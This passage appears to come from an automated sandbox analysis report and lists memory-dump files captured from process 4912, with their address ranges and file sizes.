                                                • memory/4912-370-0x00007FFFD1FC0000-0x00007FFFD1FD9000-memory.dmp

                                                  Filesize

                                                  100KB

                                                • memory/4912-369-0x00007FFFC20F0000-0x00007FFFC226F000-memory.dmp

                                                  Filesize

                                                  1.5MB

                                                • memory/4912-368-0x00007FFFD23A0000-0x00007FFFD23C4000-memory.dmp

                                                  Filesize

                                                  144KB

                                                • memory/4912-367-0x00007FFFD26B0000-0x00007FFFD26CA000-memory.dmp

                                                  Filesize

                                                  104KB

                                                • memory/4912-366-0x00007FFFD23D0000-0x00007FFFD23FD000-memory.dmp

                                                  Filesize

                                                  180KB

                                                • memory/4912-365-0x00007FFFD9900000-0x00007FFFD990F000-memory.dmp

                                                  Filesize

                                                  60KB

                                                • memory/4912-30-0x00007FFFD2780000-0x00007FFFD27A5000-memory.dmp

                                                  Filesize

                                                  148KB

                                                • memory/4912-363-0x00007FFFC1BB0000-0x00007FFFC20E3000-memory.dmp

                                                  Filesize

                                                  5.2MB